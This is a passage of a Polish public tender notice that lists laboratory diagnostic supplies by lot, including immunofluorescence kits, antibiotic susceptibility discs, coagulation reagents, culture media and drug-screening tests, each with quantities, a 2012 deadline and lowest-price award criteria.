<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 8 - Diagnostyka Chlamydia Trachomatis wyszczególniona w załączniku nr 2.8 do SIWZ:
1. Zestaw do oznaczania antygenu  Ch.trachomatis                                            /metodą immunofluorescencji IF/ - zamawiana ilość - 1400 ozn.
2. Szkiełka do diagnostyki Ch. trachomatis metodą IF  / poj oznaczenie na szkiełku, średnica pola nie mniej niż 8 mm/ - zamawiana ilość - 500 szt.
UWAGI:                                                                                                                                                             1. Każdy zestaw zawiera kontrolę dodatnią i ujemną.
2. Każdy zestaw zawiera WSZYSTKIE odczynniki pozwalające na wykonanie testu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET nr 9 - Diagnostyka zakażeń wywołanych przez Borrelia burgdorferi. Metoda: immunofluoroscencja pośrednia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 9 - Diagnostyka zakażeń wywołanych przez Borrelia burgdorferi. Metoda: immunofluoroscencja pośrednia wyszczególniona w załączniku nr 2.9 do SIWZ:
1. Zestaw do oznaczania przeciwciał przeciw Borrelia burgorferi w klasie IgG - zamawiana ilość - 150 (3 oznaczenia x 50 szkiełek).
2. Zestaw do oznaczania przeciwciał przeciw Borrelia burgorferi w klasie IgG - zamawiana ilość - 200 (5 oznaczeń x 40 szkiełek).
3. Zestaw do oznaczania przeciwciał przeciw Borrelia burgorferi w klasie IgM	150 - zamawiana ilość - (3 oznaczenia  x 50  szkiełek).
4. Zestaw do oznaczania przeciwciał przeciw Borrelia burgorferi w klasie IgM - zamawiana ilość - 200 (5 oznaczeń x 40 szkiełek).
UWAGI:                                                                                                                                                                                                                                                                                                                       Zestaw zawiera WSZYSTKIE odczynniki potrzebne do wykonania oznaczeń oraz surowicę kontrolną.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET nr 10 - Diagnostyka kału.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 10 - Diagnostyka kału wyszczególniona w załączniku nr 2.10 do SIWZ:
1. Zestaw do jakościowego wykrywania krwi utajonej w kale (bez specjalnej diety) - zamawiana ilość - 400 ozn. wymagana wielkość op. - 	25 ozn.
2. Zestaw do oznaczania antygenu GIARDIA LAMBLIA metodą immunoenzymatyczną	- zamawiana ilość - 384 ozn. wymagana wielkość op. - 	96 ozn.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET nr 11 - Mikrobiologia - krążki do badania lekowrażliwości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 11 - Mikrobiologia - krążki do badania lekowrażliwości wyszczególniona w załączniku nr 2.11 do SIWZ:
1. AMPICYLINA /SULFBACTAM 10/10 - zamawiana ilość - 50  szt. wymagana wielkość op. - 50 szt.
2. CEFAKLOR 30ug - zamawiana ilość - 50 szt.	 wymagana wielkość op. - 50 szt.
3. CEFEPIM 30ug	- zamawiana ilość - 100 szt.	 wymagana wielkość op. - 50 szt.
4. CHINUPRISTYNA / DALFOPRISTYNA 15ug - zamawiana ilość - 50 szt.	 wymagana wielkość op. - 50 szt.
5. GENTAMICYNA 120ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 	50 szt.
6. Gentamicyna 30 ug - zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
7. GENTAMICYNA 10ug	- zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
8. KLARYTROMYCYNA 15ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
9. LINEZOLID 30ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
10. LINEZOLID 10 ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
11. LEWOFLOKSACYNA 5ug - zamawiana ilość - 50 szt. wymagana wielkość op. -	50 szt.
12. MEROPENEM 10ug	- zamawiana ilość - 100 szt. wymagana wielkość op. -	50 szt.
13. MUPIROCYNA 200ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
14. PIPERACYLINA/TAZOBACTAM 100/10ug - zamawiana ilość -100 szt.	wymagana wielkość op. - 50 szt.
15. PIPERACYLINA/TAZOBACTAM 30/6 ug	- zamawiana ilość -100 szt. wymagana wielkość op. - 50 szt.
16. TRIMETOPRIM 5ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
17. AMIKACYNA 30ug - zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
18. AMOKSYCYLINA Z KWASEM KLAWULANOWYM 20/10ug	- zamawiana ilość - 200 szt. wymagana wielkość op. - 50 szt.
19. AMPICYLINA 10ug - zamawiana ilość - 150 szt. wymagana wielkość op. - 50 szt.
20. AMPICYLINA 2 ug - zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
21. AZTREONAM 30ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
22. CEFALOTYNA 30ug	- zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
23. CEFAZOLINA 30ug - zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
24. CEFOKSYTYNA 30 ug - zamawiana ilość - 200 szt. wymagana wielkość op. -	50 szt.
25. CEFOPERAZON 75ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
26. CEFOTAKSYM 30ug	- zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
27. CEFOTAKSYM 5ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
28. CEFTAZYDYM 30ug	- zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
29. CEFTAZYDYM10 ug	- zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
30. CEFUROKSYM 30ug	- zamawiana ilość - 200 szt. wymagana wielkość op. - 50 szt.
31.CHLORAMFENICOL 30ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
32. CIPROFLOKSACYNA 5ug - zamawiana ilość - 100 szt. wymagana wielkość op. -	50 szt.
33. DOKSYCYKLINA 30ug - zamawiana ilość - 100 szt.	 wymagana wielkość op. - 50 szt.
34. ERYTROMYCYNA 15ug - zamawiana ilość - 200 szt. wymagana wielkość op. -	50 szt.
35. IMIPENEM 10ug - zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
36. KANAMYCYNA 30ug	- zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
37. KARBENICYLINA 100ug - zamawiana ilość - 50 szt. wymagana wielkość op. -	50 szt.
38. KLINDAMYCYNA 2ug - zamawiana ilość - 200 szt. wymagana wielkość op. -	50 szt.
39. KOLISTYNA 50ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
40. TRIMETOPRIM/SULFAMETAKSAZOL 1,25/23,75ug	- zamawiana ilość - 350 szt.	wymagana wielkość op. - 50 szt.
41. KWAS FUSYDOWY 10ug - zamawiana ilość - 50 szt. wymagana wielkość op. -	50 szt.
42. MEZLOCYLINA 75ug	 - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
43. NETYLMYCYNA 30ug - zamawiana ilość - 50 szt. wymagana wielkość op. -50 szt.
44. NETYLMYCYNA10 ug - zamawiana ilość - 50 szt. wymagana wielkość op. -50 szt.
45. NITROFURANTOINA 300ug	 - zamawiana ilość - 100 szt.	wymagana wielkość op. - 50 szt.
46. NITROFURANTOINA 100Uug - zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
47. NORFLOKSACYNA 10ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
48. OFLOKSACYNA 5ug	- zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
49. OKSACYLINA 1ug - zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
50. PENICYLINA G 1 IU	- zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
51. PENICYLINA V 10 ug - zamawiana ilość - 50 szt. wymagana wielkość op. -	50 szt.
52. PIPERACYLINA 100ug - zamawiana ilość - 100 szt. wymagana wielkość op. -	50 szt.
53. PIPERACYLINA 30 ug - zamawiana ilość - 100 szt.	wymagana wielkość op. -50 szt.
54. RIFAMPICYNA 5ug	- zamawiana ilość - 50 szt. wymagana wielkość op. -	50 szt.
55. STREPTOMYCYNA 300ug	- zamawiana ilość - 50 szt. wymagana wielkość op. -	50 szt.
56. TEIKOPLANINA 30ug - zamawiana ilość - 50 szt. wymagana wielkość op. -	 50 szt.
57. TETRACYKLINA 30ug - zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
58. TIKARCYLINA 75ug	- zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
59. TIKARCYLINA Z KWASEM KLAWULANOWYM 75/10ug - zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
60. TOBRAMYCYNA 10ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
61. TROMETAMOL FOSFOMYCYNY 200ug	- zamawiana ilość - 100 szt. wymagana wielkość op. - 50 szt.
62. VANKOMYCYNA 30ug - zamawiana ilość - 50 szt. wymagana wielkość op. -	50 szt.
63. VANKOMYCYNA 5 ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
64. CEFPODOKSYM 10Ug - zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
65. TIGECYLINA 15ug - zamawiana ilość -	 50 szt. wymagana wielkość op. - 50 szt.
66. ERTAPENEM 10 ug	- zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
67. MINOCYKLINA 30 UG - zamawiana ilość - 50 szt.	wymagana wielkość op. - 50 szt.
68. KOKSIFLOKSACYNA 5 ug	- zamawiana ilość - 50 szt. wymagana wielkość op. - 50 szt.
69. CEFTRIAKSON 30 ug - zamawiana ilość - 50 szt. wymagana wielkość op. -50 szt.
70. KWAS NALIDYKSOWY 30 ug - zamawiana ilość - 50 szt.	wymagana wielkość op. - 50 szt.
UWAGI:                                                                                                                                                            1. Wszystkie krążki jednego producenta.
2. Krążki w rurkach hermetycznie zamkniętych.
3. Na KAŻDYM krążku z obydwu stron zaznaczone stężenie oraz obowiązujący skrót.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET nr 12 - Koagulologia - do aparatu COAG CHROM 3003.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 12 - Koagulologia - do aparatu COAG CHROM 3003 wyszczególniona w załączniku nr 2.12 do SIWZ:
1. OZNACZENIE PROTROMBINY i FIBRYNOGENU - zestaw - zamawiana ilość - 3 200 ozn.
2. CZAS KAOLINOWO - KEFALINOWY (APPT) - zestaw	 - zamawiana ilość - 1 200 ozn. 
3. PLAZMA KONTROLNA - wartości prawidłowe - zamawiana ilość - 20 ml
4. PLAZMA KONTROLNA - wartości podwyższone - zamawiana ilość - 20 ml
5. PLAZMA KONTROLNA - wartości obniżone - zamawiana ilość - 20 ml
Uwagi:
1. Pozycja 1 - zestaw umożliwia JEDNOCZESNE wykonanie oznaczenia PT i fibrynogenu.
2. Wykonawca DO OFERTY dołącza instrukcję wykonania w języku polskim.
3. Zestawy zawierają WSZYSTKIE ODCZYNNIKI NIEZBĘDNE DO WYKONANIA OZNACZEŃ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET nr 13 - Diagnostyka RZS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 13 - Diagnostyka RZS wyszczególniona w załączniku nr 2.13 do SIWZ:
1. Zestaw do ilościowego oznaczania  przeciwciał anty CETRULINOWYCH ( anty CCP) METODĄ IMMUNOENZYMATYCZNĄ - zamawiana ilość - 864 ozn. wymagana wielkość op. - 96 ozn..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET nr 14 - Diagnostyka chorób z autoagresji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 14 - Diagnostyka chorób z autoagresji wyszczególniona w załączniku nr 2.14 do SIWZ:
1. Zestaw do oznaczania przeciwciał przeciwjądrowych metodą immunoenzymatyczną ( ENA 6 - SCREENING:SSA,SSB,Sm, SmRNP,Scl70, Jo1)	- zamawiana ilość - 192 ozn.
2. Zestaw do wykrywania przeciwciał przeciwjądrowych (ANA) metodą immunofluorescencyjną	- zamawiana ilość - 2400 ozn.
3. Zestaw do oznaczania przeciwciał przeciw ds DNA  / antygen- Crithidia luciliae/    metodą   immunofluorescencyjną - zamawiana ilość - 172 ozn.
Uwagi:
Pozycja 1 : 
Zestaw powinien zawierać studzienki reakcyjne, które pozwalają się pojedynczo odrywać.
Data ważności zestawu powinna być nie krótsza niż 6 miesięcy od dostarczenia go do Zamawiającego.
Pozycja 2: 
1. Równoczesna ocena na dwóch substratach; komórki wątroby małpy i Hep-2.                                                              
 2. Wykonawca z pierwszym zestawem dostarcza  preparaty kontrolne z wszystkimi typami świecenia.
Wszystkie zestawy / pozycja 1-3/ pochodzą od tego samego producenta.
Pozycja 3: na szkiełkach nie więcej niż 4 pozycje reakcyjne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET nr 15 - Diagnostyka HIV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 15 - Diagnostyka HIV wyszczególniona w załączniku nr 2.15 do SIWZ:
1. Test potwierdzenia HIV 1 metodą WESTERN BLOT - zamawiana ilość - 72 ozn. wymagana wielkość op.- 18 ozn.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET nr 16 - Mikrobiologia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 16 - Mikrobiologia wyszczególniona w załączniku nr 2.16 do SIWZ:
1. Zestaw do hodowli, identyfikacji i oceny ilościowej oraz oznaczenia  lekowrażliwości mykoplazm wywołujących zakażenia dróg moczowo - płciowych - zamawiana ilość -	50 ozn. wymagana ilość op. -	25 ozn.
Uwagi:		 
Zestaw zawiera WSZYSTKIE odczynniki potrzebne do wykonania oznaczenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PAKIET nr 17 - Testy z wykorzystaniem metod aglutynacji, precypitacji, hemaglutynacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 17 - Testy z wykorzystaniem metod aglutynacji, precypitacji, hemaglutynacji wyszczególnione w załączniku nr 2.17 do SIWZ:
1. Zestaw do oznaczania przeciwciał ANTY T.PALLIDUM METODĄ HEMAGLUTYNACJI (TPHA) - krwinki gotowe do użycia	- zamawiana ilość - 300 ozn. wymagana wielkość op. - 	100 ozn.
2. Zestaw do oznaczania czynnika REUMATOIDALNEGO RA METODĄ AGLUTYNACJI (wykrywanie i ocena półilościowa) - zamawiana ilość - 500 ozn. wymagana wielkość op. -	100 ozn.
3. Zestaw do oznaczania czynnika WAALER-ROSE METODĄ AGLUTYNACJI   (wykrywanie i ocena półilościowa) - zamawiana ilość - 400 ozn. wymagana wielkość op. -	100 ozn.
4. Zestaw do oznaczania ANTYSTREPTOLIZYNY ASO METODĄ AGLUTYNACJI (wykrywanie i ocena półilościowa) - zamawiana ilość - 300 ozn. wymagana wielkość op. -100 ozn.                     Uwagi:                                                                                                                                                                                                                                                                                                                Zestawy zawierają kontrolę dodatnią i ujemną oraz wszystkie odczynniki do wykonania oznaczenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PAKIET nr 18 - Diagnostyka narkotyków w moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 18 - Diagnostyka narkotyków w moczu wyszczególniona w załączniku nr 2.18 do SIWZ:
1. MORFINA, HEROINA  czułość co najmniej 300 ug/ml	- zamawiana ilość - 20 szt. 
2. BARBITURANY czułość co najmniej 300 ug/ml	- zamawiana ilość - 50 szt.
3. AMFETAMINA czułość co najmniej 500 ug/ml	- zamawiana ilość - 20 szt. 
4. MARIHUANA (THC) czułość co najmniej 50 ug/ml - zamawiana ilość - 20 szt
Uwaga:
Testy pakowane pojedynczo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PAKIET nr 19 - Diagnostyka Helicobacter pyroli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 19 - Diagnostyka Helicobacter pyroli wyszczególniona w załączniku nr 2.19 do SIWZ:
1. Oznaczenie antygenu Helicobacter pylori w kale - zamawiana ilość - 60 ozn. wymagana wielkość op. - 20 ozn.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PAKIET nr 20 - Mikrobiologia - krążki diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 20 - Mikrobiologia - krążki diagnostyczne wyszczególnione w załączniku nr 2.20 do SIWZ:
1. Krążki nasycone  bacytracyną do identyfikacji STREPTOCOCCUS - zamawiana ilość - 50 szt. wymagana wielkość op. - 50
2. Krążki nasycone chlorowodorkiem ETYLOHYDROKUPREINY do rozróżnienia szczepów Streptococcus pneumoniae - zamawiana ilość -	100 szt. wymagana wielkość op. -	50
3. Krążki do różnicowania szczepów Enterococcu faecalis i Enterococcus faecium	- zamawiana ilość - 150 szt. wymagana wielkość op. - 50
4. Krążki nasycone furazolidonem do różnicowania bakterii z rodzaju STAPHYLOCOCCUS od bakterii z rodzaju MICROCOCCUS - zamawiana ilość - 50 szt.	wymagana wielkość op. - 50
5. Krążki nasycone nowobiocyną do identyfikacji STAPHYLOCOCCUS SAPROPHYTICUS	- zamawiana ilość - 50 szt. wymagana wielkość op. - 50
6. Krążki wysycane glukozą i błękitem BROMOTYMOLOWYM do różnicowania bakterii z  rodzaju MORAXELLA od bakterii z rodzaju NEISSERIA - zamawiana ilość - 150 szt.	wymagana wielkość op. - 50
7. Krążki do różnicowania pałeczek z rodzaju  HAEMOPHILUS NASYCONE : czynnikiem V (wyciąg drożdżowy) i bacytracyna - zamawiana ilość - 100 szt.	wymagana wielkość op. - 50
8. Krążki do różnicowania pałeczek z rodzaju  HAEMOPHILUS NASYCONE CZYNNIKIEM X (hematyną) i BACYTRACYNĄ - zamawiana ilość - 100 szt.	wymagana wielkość op. - 50
9. Krążki nasycone CEFINAZĄ do badania obecności B-laktamaz - zamawiana ilość - 200 szt. wymagana wielkość op. -	25
10. Krążki bibułowe, jałowe o średnicy  6 mm - zamawiana ilość - 50 szt.	wymagana wielkość op. - 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> PAKIET nr 21 - Testy do szybkiej identyfikacji bakterii/ Met. Aglutynacyjną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 21 - Testy do szybkiej identyfikacji bakterii/ Met. Aglutynacyjną wyszczególnione w załączniku nr 2.21 do SIWZ:
1. Zestaw do identyfikacji paciorkowców BETA-HEMOLIZUJACYCH	- zamawiana ilość - 100 ozn.
2. Zestaw do szybkiej identyfikacji STREPTOCOCCUS PNEUMONIAE - zamawiana ilość - 50 ozn.
3. Test do szybkiej identyfikacji  S.aureus	 - zamawiana ilość - 100 ozn.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> PAKIET nr 22 - Mikrobiologia - krążki diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 22 - Mikrobiologia - krążki diagnostyczne wyszczególnione w załączniku nr 2.22 do SIWZ:
1. Agar do badania szczepów wywołujących hemofilię wzbogacony 5% krwią barana   ( COLUMBIA) - zamawiana ilość - 600 szt.  wymagana wielkość op. - 20 szt.
2. CHROMOGENNE podłoże do ilościowego badania bakterii w moczu z identyfikacją bezpośrednią ESCHERICHIA coli, ENTEROCOCCUS spp., PROTEUS  spp.	- zamawiana ilość - 400 szt. wymagana wielkość op. - 	20 szt.
3. Podłoże do izolowania PSEUDOMONAS AERUGINOSA  - zamawiana ilość - 50 szt.	wymagana wielkość op. - 10 szt.
4. Podłoże do hodowli dwoinek  RZEŻĄCZKI WG THAYERA-MARTINA  - zamawiana ilość - 200 szt.	wymagana wielkość op. - 10 szt.
5. Wybiórcze CHROMOGENNE podłoże do identyfikacji grzybów drożdżopodobnych co do co najmniej  4 gatunków - zamawiana ilość - 100 szt. wymagana wielkość op. - 	10 szt.
6. Podłoże MULLER HINTONA do badania lekowrażlowośći  metodą DYFUZYJNO-KRĄŻKOWĄ	- zamawiana ilość - 600 szt.	wymagana wielkość op. - 20 szt.
7. Podłoże przeglądowe do wykrywania szczepów  opornych na  GENTAMICYNĘ /500 mg/l/	- zamawiana ilość - 10 szt.	wymagana wielkość op. - 10 szt.
8. Podłoże przeglądowe do wykrywania  wankomycynoopornych szczepów gronkowców /4 mg/l/ - zamawiana ilość -	10 szt. wymagana wielkość op. - 10 szt.
9. Podłoże przeglądowe do wykrywania  wankomycynoopornych szczepów ENTEROKOKÓW /6mg/l/	- zamawiana ilość - 10 szt. wymagana wielkość op. - 10 szt.
10. Podłoże chromogenie  do badań przesiewowych w kierunku gronkowców - zamawiana ilość - 100 szt. wymagana wielkość op. - 	10 szt.
11. Podłoże  SABOUROUD z CHLORAMFENIKOLEM i AKTIDIONEM - zamawiana ilość - 600 szt. wymagana wielkość op. - 20 szt.
12. Podłoże do hodowli beztlenowców GRAM+  I GRAM - zamawiana ilość - 40 szt.	wymagana wielkość op. - 10 szt.
13. Wybiórcze podłożę do wykrywania i identyfikacji  PACIORKOWCÓW              GRUPY B - zamawiana ilość - 50 szt. wymagana wielkość op. -  10 szt.
14. Zestaw do uzyskania warunków hodowli MIKROAEROFILNYCH z wskaźnikiem - zamawiana ilość - 20 szt. wymagana wielkość op. - 10 szt.
15. Zestaw do uzyskania warunków hodowli ANAEROFILNYCH z wskaźnikiem	- zamawiana ilość - 20 szt. wymagana wielkość op. - 10 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> PAKIET nr 23 - Testy identyfikacyjne na podstawie cech biochemicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 23 - Testy identyfikacyjne na podstawie cech biochemicznych wyszczególnione w załączniku nr 2.23 do SIWZ:
1. Zestawy do identyfikacji pałeczek z rodz. Enterobacteriaceae - zamawiana ilość - 100 szt. 
2. Zestawy do identyfikacji pałeczek niefermentujących - zamawiana ilość - 50 szt. 
3. Zestawy do identyfikacji bakterii z rodzaju Neisseria - zamawiana ilość - 50 szt. 
4. Zestawy do identyfikacji bakterii beztlenowych - zamawiana ilość - 25 szt. 
5. Zestawy do identyfikacji paciorkowców	 - zamawiana ilość - 50 szt. 
6. Zestawy do identyfikacji gronkowców	- zamawiana ilość - 50 szt. 
7. Zestawy do identyfikacji enterokoków	- zamawiana ilość - 50 szt. 
8. Program umożliwiający identyfikację - zamawiana ilość - 1 szt. 
Uwagi:
1. Zestawy zawierają nie więcej niż 25 oznaczeń.
2. Wykonawca proponuje / dodatkową tabelę / wszystkie odczynniki niezbędne do wykonania oznaczeń w ilości proporcjonalnej do    zamówienia
3. W przypadku stwierdzenia i udokumentowania błędnego (mniejszego) oszacowania przez Wykonawcę oferowanych ilości odczynników Wykonawca zobowiązuje się do uzupełnienia braków na własny koszt.
4. Wykonawca proponuje w tabeli wszystkie odczynniki umożliwiające identyfikację z wykorzystaniem proponowanych zestawów w ilościach dostosowanych do ilości zamawianych oznaczeń.
5. Jeżeli Wykonawca posiada zestaw do identyfikacji paciorkowców i enterokoków razem zsumuje ilość oznaczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> PAKIET nr 24 - Substraty do podłoża Stonenbrika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 24 - Substraty do podłoża Stonenbrika wyszczególnione w załączniku 2.24 do SIWZ:
1. Pirogronian sodu - zamawiana ilość - 150g, wymagana wielkość op. -	10g.
2. Wodorofosforan sodowy uwodniony /Na2HPO42H2O/ - zamawiana ilość - 250g, wymagana wielkość op. - 250g.
3. Czerwień bromokrezolowa - zamawiana ilość - 25g, wymagana wielkość op. - 5g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> PAKIET nr 25 - Szczepy wzorcowe.</p>
